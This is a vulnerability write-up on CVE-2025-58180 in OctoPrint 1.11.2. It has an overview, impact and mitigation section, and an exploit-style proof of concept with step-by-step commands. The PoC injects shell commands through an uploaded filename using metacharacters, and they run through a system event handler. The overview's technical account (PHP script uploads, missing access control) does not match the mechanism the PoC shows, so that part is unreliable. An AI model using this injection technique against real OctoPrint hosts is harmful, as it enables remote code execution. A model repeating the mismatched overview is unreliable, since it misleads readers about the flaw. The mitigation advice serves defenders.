Overview
The vulnerability identified as CVE-2025-58180 affects OctoPrint version 1.11.2, a widely used open-source 3D printer management software. This flaw allows unauthorized file uploads, potentially enabling attackers to execute arbitrary code on the server hosting OctoPrint. The risk is particularly concerning for environments that rely on OctoPrint for managing sensitive projects and data.
Technical Details
This vulnerability arises from insufficient validation of uploaded files within OctoPrint. When a user uploads a file, the application does not adequately verify the file type or content, allowing an attacker to upload malicious scripts disguised as legitimate files. For instance, an attacker could upload a PHP script that, once executed, could compromise the server, leading to unauthorized access or data exfiltration.
Additionally, the lack of proper access control mechanisms means that once the malicious file is uploaded, it can be accessed by anyone who can reach the server, further amplifying the potential for exploitation. This scenario highlights the critical need for stringent file validation and access control measures in web applications.
Impact
The consequences of this vulnerability can be severe. An attacker gaining access to the OctoPrint server could manipulate 3D printing jobs, disrupt manufacturing processes, or even deploy ransomware. Sensitive data could be exposed, leading to reputational damage and potential legal ramifications for organizations that fail to secure their systems.
Mitigation
To protect against CVE-2025-58180, it is essential for users of OctoPrint to upgrade to the latest version immediately, where this vulnerability has been addressed. Regularly updating software not only patches known vulnerabilities but also improves overall security posture.
Furthermore, organizations should implement strict file upload policies, including file type restrictions and content scanning for potentially malicious payloads. Employing a Web Application Firewall (WAF) can also help detect and block suspicious upload attempts. Security professionals should regularly audit their systems and conduct penetration testing to identify and remediate vulnerabilities proactively.
Proof of Concept (PoC)
# Exploit Title: OctoPrint 1.11.2 - File Upload
# Date: 2025-09-28
# Exploit Author: prabhatverma.addada
# Vendor Homepage: https://octoprint.org
# Software Link: https://github.com/OctoPrint/OctoPrint
# Affected Version(s): <= 1.11.2
# Patched Version(s): 1.11.3
# CVE: CVE-2025-58180
# CVSS (per advisory): 7.5
# Platform: Linux / OctoPrint server
# Type: Remote Code Execution (requires authenticated upload / API key or session)
#
# Short description:
# An authenticated attacker with file-upload access can craft a filename containing shell metacharacters (e.g. ';', ${IFS}) which bypasses filename
# sanitization and, when interpolated into a configured system event handler command, results in arbitrary command execution on the host.
#
# Scope & privileges:
# - Trigger privileges: Authenticated file-upload (API key or valid session). NO admin/root required to trigger the attack.
# - Precondition: A system event handler that executes shell commands using filename/path placeholders must be configured by an administrator.
#
# Tested on:
# - OctoPrint 1.11.2 running via `octoprint serve --port 5000` on Ubuntu 22.04
#
# Reproduction / PoC (manual):
#
# 1) Start OctoPrint 1.11.2:
# octoprint serve --port 5000 --debug
# Complete initial setup at http://127.0.0.1:5000 and create an admin user.
#
# 2) Configure a system event handler that runs shell commands with filename placeholders:
# Edit ~/.octoprint/config.yaml and add:
#
# events:
# enabled: true
# subscriptions:
# - event: FileAdded
# type: system
# debug: true
# command: "{path}"
#
# Restart OctoPrint.
#
# 3) Create a harmless test gcode:
# mkdir -p /tmp/gcode
# cat > /tmp/gcode/ok.gcode <<'EOF'
# ; minimal gcode
# G28
# M105
# EOF
#
# 4) Obtain API key from Settings -> API and export it:
# export API_KEY='<your_api_key_here>'
#
# 5) Ensure target proof file does not exist:
# ls -la /tmp/test123
#
# 6) PoC upload (non-destructive proof):
# INJECT_NAME='octo;touch${IFS}/tmp/test123;#.gcode'
#
# curl -sS -X POST -H "X-Api-Key: $API_KEY"
# -F "file=@/tmp/gcode/ok.gcode;filename="${INJECT_NAME}""
# "http://127.0.0.1:5000/api/files/local"
#
# 7) Verify execution:
# ls -la /tmp/test123
# If /tmp/test123 exists, the injected command executed and RCE is demonstrated.
#
# Explanation:
# - OctoPrint accepted the uploaded filename (sanitize_name allowed these characters in default config).
# - FileAdded event payload contains the filename/path.
# - A system event subscriber executed a shell command with that placeholder via subprocess with shell=True and without placeholder escaping.
# - Shell metacharacters in the filename are interpreted by the shell and executed.
#
# Mitigations / Workarounds:
# - Upgrade OctoPrint to 1.11.3 (patched).
# - Disable event handlers using filename placeholders (set enabled: false or uncheck in GUI Event Manager).
# - Set feature.enforceReallyUniversalFilenames: true in config.yaml and vet existing uploads.
# - Do not expose OctoPrint to hostile networks; restrict upload access.
#
# References:
# - GitHub Security Advisory: https://github.com/OctoPrint/OctoPrint/security/advisories/GHSA-49mj-x8jp-qvfc
# - PoC repo: https://github.com/prabhatverma47/CVE-2025-58180
#
# Notes for triage:
# - Exploit requires only authenticated upload privileges to trigger. No admin/root required to perform the attack.
# - PoC uses non-destructive `touch /tmp/test123`.